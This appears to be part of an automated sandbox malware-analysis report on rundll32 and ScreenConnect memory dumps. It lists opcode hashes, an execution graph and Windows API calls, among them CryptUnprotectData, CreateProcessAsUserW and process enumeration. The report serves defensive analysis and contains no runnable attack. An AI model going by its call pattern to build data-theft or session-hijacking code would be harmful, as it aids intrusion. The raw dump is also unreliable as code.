                                                                • API String ID:
                                                                • Opcode ID: 16bd76a44b563e705f931507e9ca84dfffcbfc71ca0f909eef2d76ca6ca4698d
                                                                • Instruction ID: f1eec0e1c8b3a9bdbc015065977ed523ae4d21f0ade7976e4f45ef33ee1bd0aa
                                                                • Opcode Fuzzy Hash: 16bd76a44b563e705f931507e9ca84dfffcbfc71ca0f909eef2d76ca6ca4698d
                                                                • Instruction Fuzzy Hash: 53E0D8B4905248FFC701CBB4EE014ACBFF6DB4620071004E6E408EB261DA315E048792
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 00f45e22b73fa69364eed685a7b4b16bb2135cd26ddb8ffc6e88c8470cef080a
                                                                • Instruction ID: bb6920a4ff1b1b0109d3e6156682c100930c72e81f8627c02297228d6fd93234
                                                                • Opcode Fuzzy Hash: 00f45e22b73fa69364eed685a7b4b16bb2135cd26ddb8ffc6e88c8470cef080a
                                                                • Instruction Fuzzy Hash: 0BE07D367002005BC304AA2FE850967F79FEBCD228B10443EE10CC7305CE32DC02C690
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26f84686ced31b45f27179aca0463282a97e0ec88a599291ad754f74d9831558
                                                                • Instruction ID: 01b139266aec5fe519effae4ba70a6509372428a3076a557aa9bd0bc685ec6a6
                                                                • Opcode Fuzzy Hash: 26f84686ced31b45f27179aca0463282a97e0ec88a599291ad754f74d9831558
                                                                • Instruction Fuzzy Hash: 2EE0D8B2914308FFCB01CF78E95259DBFF4EF16204B204895D454D7201DB346E44CB51
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 83992428e2c92641b49e1abd0ac0d1fb5a8add7ac21872a5f5b533ce4df89df3
                                                                • Instruction ID: 488c97ae19bed05bd3991a5dbcc3874889e9a61df7a4d93fead2b8097bb6a7a6
                                                                • Opcode Fuzzy Hash: 83992428e2c92641b49e1abd0ac0d1fb5a8add7ac21872a5f5b533ce4df89df3
                                                                • Instruction Fuzzy Hash: 11E0C272681229ABE7112B96B458BFB7F5AEF54375F409022FE0C46260CA356890D7E0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77717e6f912de8ef5d8a44626c4812d95faeb514d895430dae7bc58e0ff6ccf2
                                                                • Instruction ID: 97cb03783dbe549e13e2f61c57bee6d0821f53b11cb477c02fdaea8e149866ad
                                                                • Opcode Fuzzy Hash: 77717e6f912de8ef5d8a44626c4812d95faeb514d895430dae7bc58e0ff6ccf2
                                                                • Instruction Fuzzy Hash: C7D02E3B2081C88FCB066B21B8940AA7FB3AB1E21030850D3E5E58BAB2CF300854C780
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95b17e85c0030eab416ba0057bcdab8c500600baf9c62dd3ab2535d024fc0952
                                                                • Instruction ID: 219c961cd742b5f71cce74012d8bac08ab6febd9240b9a0c2b2ffcd0ab07c939
                                                                • Opcode Fuzzy Hash: 95b17e85c0030eab416ba0057bcdab8c500600baf9c62dd3ab2535d024fc0952
                                                                • Instruction Fuzzy Hash: 3ED0A73235001C7B96046719D8D587ABBA9E7892603108477FA0683334DD71BC418795
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c9ecf3423136513038940b4109b89ae850f20d66a10235866756e57dc606f47e
                                                                • Instruction ID: 4ac2b790174266dd29b4ba36ef166c413fe27a194c3e6a4ba4b4ffcca2d0f69f
                                                                • Opcode Fuzzy Hash: c9ecf3423136513038940b4109b89ae850f20d66a10235866756e57dc606f47e
                                                                • Instruction Fuzzy Hash: F6D0A776A46341DADF011B74B0282D7BF65DB09114F1140D7DA04DB16BDE3A9C1543C0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 885296e77b77b8d910e6a4046acfd2695ea6a3ef3f377f4253e632e4b423edde
                                                                • Instruction ID: d4f2709613287c2cb88861a8c6b709aaa4e17652cc245720324fa5a604cdbe71
                                                                • Opcode Fuzzy Hash: 885296e77b77b8d910e6a4046acfd2695ea6a3ef3f377f4253e632e4b423edde
                                                                • Instruction Fuzzy Hash: 76D01270901208EFCB00DFA4EA4195DBBFADB49204B2045A9E808D7250DB715F049791
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05815d5e42a5b514ba029b99445b803a6a1b215f99972fd29668e69debd74233
                                                                • Instruction ID: e919a1e1533e7781e0f2f4e8d60ec31084b93ac96972aa6a4f080ed4abc220e7
                                                                • Opcode Fuzzy Hash: 05815d5e42a5b514ba029b99445b803a6a1b215f99972fd29668e69debd74233
                                                                • Instruction Fuzzy Hash: 4CD05EB4A0020CEFCB01DFA9FA4555DBBF9EB49204B1049A8D418E7300EF316F409B91
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbfa98eeb11f18cf4883b376d572c1a0ec5e1a2adbdbabb8539d9b8e84dbb00f
                                                                • Instruction ID: bee8f972245d9fb9ec87571ef363df6636724fcf9fa4b62595b588d495a87ce8
                                                                • Opcode Fuzzy Hash: fbfa98eeb11f18cf4883b376d572c1a0ec5e1a2adbdbabb8539d9b8e84dbb00f
                                                                • Instruction Fuzzy Hash: 53C080F7775D446FF31105045CCB5E37B30F6712043898155C040D4017E11AF0578175
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000003.1671078691.0000000004E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_3_4e10000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42aa6008f56ef44602b3a125f8cfa24841ae7aa5a262736f64f45de02c9691e1
                                                                • Instruction ID: e21c24f1a82d586ba35eba7553e2ac162f8605c787de586800b98ee2a4a99c6b
                                                                • Opcode Fuzzy Hash: 42aa6008f56ef44602b3a125f8cfa24841ae7aa5a262736f64f45de02c9691e1
                                                                • Instruction Fuzzy Hash: 4BC04C36241018BBDF452E91A4189EA7F26EF59362F508025FA5985260DA354920AB50

                                                                Execution Graph

                                                                Execution Coverage:12.5%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:11.9%
                                                                Total number of Nodes:101
                                                                Total number of Limit Nodes:9
                                                                execution_graph 39352 56b1be8 39355 56b1814 39352->39355 39356 56b1eb8 ConnectNamedPipe 39355->39356 39358 56b1f48 39356->39358 39358->39358 39359 3e016f8 39360 3e01740 CryptProtectData 39359->39360 39361 3e0173a 39359->39361 39362 3e01783 39360->39362 39361->39360 39363 56b0040 39364 56b0071 39363->39364 39372 56b0bc2 39364->39372 39365 56b00c7 39366 56b0207 39365->39366 39379 56b1480 39365->39379 39383 56b1470 39365->39383 39387 56b27fe 39366->39387 39367 56b0a4e 39367->39367 39373 56b0bf4 39372->39373 39375 56b0c3c 39373->39375 39395 51a5e98 39373->39395 39403 51a5e39 39373->39403 39412 51a5ea8 39373->39412 39374 56b0ccc 39375->39365 39380 56b148f 39379->39380 39455 56b15a7 39380->39455 39384 56b148f 39383->39384 39386 56b15a7 2 API calls 39384->39386 39385 56b14a4 39385->39366 39386->39385 39388 56b281e 39387->39388 39390 56b2837 39388->39390 39468 56b2950 39388->39468 39472 56b2960 39388->39472 39389 56b2860 39393 56b2960 WaitNamedPipeW 39389->39393 39394 56b2950 WaitNamedPipeW 39389->39394 39390->39367 39393->39390 39394->39390 39397 51a5ea8 39395->39397 39396 51a5ecc 39398 51a5ed5 39396->39398 39399 51a6430 4 API calls 39396->39399 39400 51a6421 4 API calls 39396->39400 39397->39396 39420 51a6430 39397->39420 39427 51a6421 39397->39427 39398->39374 39399->39396 39400->39396 39404 51a5e42 39403->39404 39406 51a5e95 39403->39406 39404->39374 39405 51a5ed5 39405->39374 39407 51a5ecc 39406->39407 39410 51a6430 4 API calls 39406->39410 39411 51a6421 4 API calls 39406->39411 39407->39405 39408 51a6430 4 API calls 39407->39408 39409 51a6421 4 API calls 39407->39409 39408->39407 39409->39407 39410->39407 39411->39407 39414 51a5ecc 39412->39414 39415 51a5edc 39412->39415 39413 51a5ed5 39413->39374 39414->39413 39416 51a6430 4 API calls 39414->39416 39417 51a6421 4 API calls 39414->39417 39418 51a6430 4 API calls 39415->39418 39419 51a6421 4 API calls 39415->39419 39416->39414 39417->39414 39418->39414 
39419->39414 39422 51a6455 39420->39422 39424 51a6465 39420->39424 39421 51a645e 39421->39396 39422->39421 39448 51a6050 39422->39448 39434 51a65b0 39424->39434 39441 51a65a1 39424->39441 39429 51a6430 39427->39429 39428 51a6455 39430 51a645e 39428->39430 39431 51a6050 ProcessIdToSessionId 39428->39431 39429->39428 39432 51a65b0 2 API calls 39429->39432 39433 51a65a1 2 API calls 39429->39433 39430->39396 39431->39428 39432->39428 39433->39428 39437 51a65da 39434->39437 39440 51a65c7 39434->39440 39435 51a65d0 39435->39422 39436 51a6742 K32EnumProcesses 39438 51a677a 39436->39438 39437->39440 39451 51a605c 39437->39451 39438->39422 39440->39435 39440->39436 39444 51a65b0 39441->39444 39442 51a65d0 39442->39422 39443 51a6742 K32EnumProcesses 39445 51a677a 39443->39445 39446 51a605c K32EnumProcesses 39444->39446 39447 51a65c7 39444->39447 39445->39422 39446->39444 39447->39442 39447->39443 39449 51a67e0 ProcessIdToSessionId 39448->39449 39450 51a6853 39449->39450 39450->39422 39452 51a66f0 K32EnumProcesses 39451->39452 39454 51a677a 39452->39454 39454->39437 39456 56b15e3 39455->39456 39460 56b25b8 39456->39460 39464 56b25c0 39456->39464 39457 56b16b1 39462 56b25c0 CreateProcessAsUserW 39460->39462 39463 56b26a4 39462->39463 39463->39457 39465 56b2613 CreateProcessAsUserW 39464->39465 39467 56b26a4 39465->39467 39467->39457 39471 56b2960 39468->39471 39470 56b29a4 39470->39389 39471->39470 39476 56b1934 39471->39476 39473 56b296d 39472->39473 39474 56b1934 WaitNamedPipeW 39473->39474 39475 56b29a4 39473->39475 39474->39473 39475->39389 39477 56b29c8 WaitNamedPipeW 39476->39477 39479 56b2a44 39477->39479 39479->39471

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 804 56b25c0-56b2611 805 56b261c-56b2620 804->805 806 56b2613-56b2619 804->806 807 56b2628-56b263d 805->807 808 56b2622-56b2625 805->808 806->805 809 56b264b-56b26a2 CreateProcessAsUserW 807->809 810 56b263f-56b2648 807->810 808->807 811 56b26ab-56b26d3 809->811 812 56b26a4-56b26aa 809->812 810->809 812->811
                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 056B268F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0
                                                                • Opcode ID: 3ddeb26167b457859310c80ffc791e6537c69f34384237bb7dda32d4f47794b0
                                                                • Instruction ID: b90c3cf6d96253ff38f283e675fc62ddb18b4bdc5c0088b3a3650c8ebb700307
                                                                • Opcode Fuzzy Hash: 3ddeb26167b457859310c80ffc791e6537c69f34384237bb7dda32d4f47794b0
                                                                • Instruction Fuzzy Hash: B8412276900249DFDB10CFA9C884ADEBBF1FF48310F14842AE958A7250D775A995CF90
                                                                APIs
                                                                • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03E0176E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2911876146.0000000003E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_3e00000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataProtect
                                                                • String ID:
                                                                • API String ID: 3091777813-0
                                                                • Opcode ID: 811170aa4d3ec260958d84869b4c49bf2f27e62fe1df412f9f88f26b68ed92ed
                                                                • Instruction ID: 7616f1e70eea190c7a2f7cd3a7668041bb2bd710bdab7e6c18293299e588edc5
                                                                • Opcode Fuzzy Hash: 811170aa4d3ec260958d84869b4c49bf2f27e62fe1df412f9f88f26b68ed92ed
                                                                • Instruction Fuzzy Hash: 1D2137B6800249DFCF10CF9AC844ADEBBF1FF88310F14852AE914AB250D3359555CFA1
                                                                APIs
                                                                • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03E0176E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2911876146.0000000003E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03E00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_3e00000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataProtect
                                                                • String ID:
                                                                • API String ID: 3091777813-0
                                                                • Opcode ID: a60123f7b98e7aa9b85fe57d76593392b528668a834af721b2cb9e147878c870
                                                                • Instruction ID: 5e2e13167a5c83c2e7d03f7ce0222b7b3a794741b34f673686536e7b939bdb1c
                                                                • Opcode Fuzzy Hash: a60123f7b98e7aa9b85fe57d76593392b528668a834af721b2cb9e147878c870
                                                                • Instruction Fuzzy Hash: 082104B68002499FCB10CF9AC844ADEFBF5FB88310F14852AE919A7250C339A595CFA1
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2E75
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0
                                                                • Opcode ID: ba87a5857dc097dcedc3cb8ea218fec910a1d2f60c460a6be9ba5652f7ff37bb
                                                                • Instruction ID: 65748ef7b666e998a805e9b52b64daffb6e006f53c20fe964a8f04e1b2203d8d
                                                                • Opcode Fuzzy Hash: ba87a5857dc097dcedc3cb8ea218fec910a1d2f60c460a6be9ba5652f7ff37bb
                                                                • Instruction Fuzzy Hash: 182114B6800249DFCB10CF99C945BEEBBF4EB48320F148419E968A7251C339A595DFA5
                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 051A2E75
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0
                                                                • Opcode ID: 31a07c9eb435f1585cd086b327e6ade06de0b2dc5709e8be5fab38169506424e
                                                                • Instruction ID: e0f2748748e65f6c1260b3ff86e3ca65505eb5f1d3e6d091866612f09ae92774
                                                                • Opcode Fuzzy Hash: 31a07c9eb435f1585cd086b327e6ade06de0b2dc5709e8be5fab38169506424e
                                                                • Instruction Fuzzy Hash: B32136B6800249DFCB11CF99C945BEEBBF4EF48320F148419EA54A7251C339A595CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2158b409db83232694581f1e5f4279a8823bd66876be895799c08cf07e5ada50
                                                                • Instruction ID: d390545a09c3d53a9a5919fd7a5de91d7df305aec13cbf9e36b67bb9204d4c24
                                                                • Opcode Fuzzy Hash: 2158b409db83232694581f1e5f4279a8823bd66876be895799c08cf07e5ada50
                                                                • Instruction Fuzzy Hash: 8F322B74A002158FDB18DF68D998A9DBBF2FF88314F1485A9D409EB355EB70AD85CF80

                                                                 Control-flow Graph (executed / not-executed basic blocks; rendered graph omitted): function at 51a65b0; block 51a65e6-51a662a calls 51a605c; block 51a6742-51a6778 calls K32EnumProcesses.
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26c6a3ef8b7fc41c012fedc1e79f5b4a6c9a24a5bcba3cf4774f243d0d1f1215
                                                                • Instruction ID: 06ffea6666242fd1ffc3692af340f366c02e875ae901cdf7abd2f4ee039776cf
                                                                • Opcode Fuzzy Hash: 26c6a3ef8b7fc41c012fedc1e79f5b4a6c9a24a5bcba3cf4774f243d0d1f1215
                                                                • Instruction Fuzzy Hash: 77519E76E006058FCB24CFA9D984AAEBBF1FF88310F14892DD06AD7651D734E845CBA1

                                                                 Control-flow Graph (executed / not-executed basic blocks; rendered graph omitted): function at 56b25b8; block 56b264b-56b26a2 calls CreateProcessAsUserW.
                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 056B268F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0
                                                                • Opcode ID: 0f0203ebf1e6c69b440f29c5475d23e3bcde14a66a203d3eacbeb4a558eadd75
                                                                • Instruction ID: 4a97cf844d923c9d78c994793a4fb2bfd9187bc9ce022edf09fcd8440e36ef3e
                                                                • Opcode Fuzzy Hash: 0f0203ebf1e6c69b440f29c5475d23e3bcde14a66a203d3eacbeb4a558eadd75
                                                                • Instruction Fuzzy Hash: 2D412476900249EFDF10CFA9C884ADEBBF5FF48310F14842AE958A7250D775AA95CF90

                                                                 Control-flow Graph (executed / not-executed basic blocks; rendered graph omitted): function at 56b1ea0; block 56b1ea0-56b1f46 calls ConnectNamedPipe.
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 056B1F30
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: d232f85ac4d91ea4d966a8f5b34f182e4ee0db65fa5529aa54f6a067fab2ebe5
                                                                • Instruction ID: 1cd11462a94c59719045efe8e202a446354b7bdf8c54b27a32e3cfb063f5cd03
                                                                • Opcode Fuzzy Hash: d232f85ac4d91ea4d966a8f5b34f182e4ee0db65fa5529aa54f6a067fab2ebe5
                                                                • Instruction Fuzzy Hash: 583136B1D04258AFDB24CFAAC594BDEBFF4AF49300F14805AE849A7350DB74A942CF90
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 056B1F30
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: 4630f6ffabb3dd5500b7d1c6b9596a41338053140d661e7f73ea37d591400c2c
                                                                • Instruction ID: e3c0cfd940e9a4c30f544d2449cbb499b9a334e17fa9c182ae6a206c33d1db67
                                                                • Opcode Fuzzy Hash: 4630f6ffabb3dd5500b7d1c6b9596a41338053140d661e7f73ea37d591400c2c
                                                                • Instruction Fuzzy Hash: 422106B0D04258EFDB24CF9AC594BDEBBF5AF49300F148069E809A7350DB759945CFA0
                                                                APIs
                                                                • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 051A6765
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: EnumProcesses
                                                                • String ID:
                                                                • API String ID: 84517404-0
                                                                • Opcode ID: 95cbcdbf38e77afd185c3568de995f2141baa11365e495ddeabaa21c744688f2
                                                                • Instruction ID: 4c9d7cd65eefa38f74775f016db8dbeac5cd2e02156a121cdb422d132598114d
                                                                • Opcode Fuzzy Hash: 95cbcdbf38e77afd185c3568de995f2141baa11365e495ddeabaa21c744688f2
                                                                • Instruction Fuzzy Hash: 082116B6D002499FDB15CF99C985BDEFBF4FB48310F14842DD519A7200C779A941CBA4
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,056B2986), ref: 056B2A2F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: 8226769b2946b771acfbc6c1a06dcf934406bdb3a54a7f06aafd9b7cd4552bf8
                                                                • Instruction ID: 95bbdd50b13835a594c839b7fca9723829e037a56d23fdc88bfa08805c8506bb
                                                                • Opcode Fuzzy Hash: 8226769b2946b771acfbc6c1a06dcf934406bdb3a54a7f06aafd9b7cd4552bf8
                                                                • Instruction Fuzzy Hash: 5F2124B68002498FDB20CF9AC444BEEBBF4FB48320F14842DD859A7341C779A985CFA1
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,056B2986), ref: 056B2A2F
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916765836.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_56b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: 5ca55cd739ef664af1ec1369a0694bb7d985257af75042c7613874173813e715
                                                                • Instruction ID: 8cbeeac15577cf1bf630d19fef8c38fd11bd69389c9d6c5fc70847c8ef00d0a0
                                                                • Opcode Fuzzy Hash: 5ca55cd739ef664af1ec1369a0694bb7d985257af75042c7613874173813e715
                                                                • Instruction Fuzzy Hash: 092115B68002498FDB20CF9AC444BDEBBF4FB88320F148469D869A7240C779A585CFA1
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A683E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 0abd8ebb1550a24f41cb2880839453123554da3d202372f42a20c5bfbb363bd5
                                                                • Instruction ID: 1971d35b868672dde41657552242a2c76f350c17206560bfde4c1a181fb3586d
                                                                • Opcode Fuzzy Hash: 0abd8ebb1550a24f41cb2880839453123554da3d202372f42a20c5bfbb363bd5
                                                                • Instruction Fuzzy Hash: A21103B6C002598FCB10CFAAC545BDEFBF4FB48324F148429D459A7241C378A545CFA1
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A683E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: a2c640128194cc63f20e7bc83d987ec2e024d684b77d3e70e269eed0bde08eb1
                                                                • Instruction ID: 89fbbe873444d86d4c0e682c272c17f3640375508e6c455ef7751e68ce57b7d0
                                                                • Opcode Fuzzy Hash: a2c640128194cc63f20e7bc83d987ec2e024d684b77d3e70e269eed0bde08eb1
                                                                • Instruction Fuzzy Hash: D91133B5C002498FCB20CF9AC4447EEFBF4FB48320F148429D469A7200C378A544CFA5
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 051A683E
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2916219460.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_51a0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 72825b3e94cae5f571cbed60ff989efc13291fdf2e3a013937e1c0b5c0b58352
                                                                • Instruction ID: 7b45107bf68e87d67875e47fd4ebcef19d70d0c7772e78e62fa0b37f03ad8a4b
                                                                • Opcode Fuzzy Hash: 72825b3e94cae5f571cbed60ff989efc13291fdf2e3a013937e1c0b5c0b58352
                                                                • Instruction Fuzzy Hash: 9F019A76C043098FDF11CF99C8097DEBBF4EF99328F188469D058A7292C739A44ACB61
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2905210852.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_113d000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f99eca3d3ef50962a92c70537597836aed2e13e36dddbf1051fc86849cd368f
                                                                • Instruction ID: e3f2e18089c3f5e131a4a31d3341a0ddb225ba95bbeb2614e91b946a5eec9c61
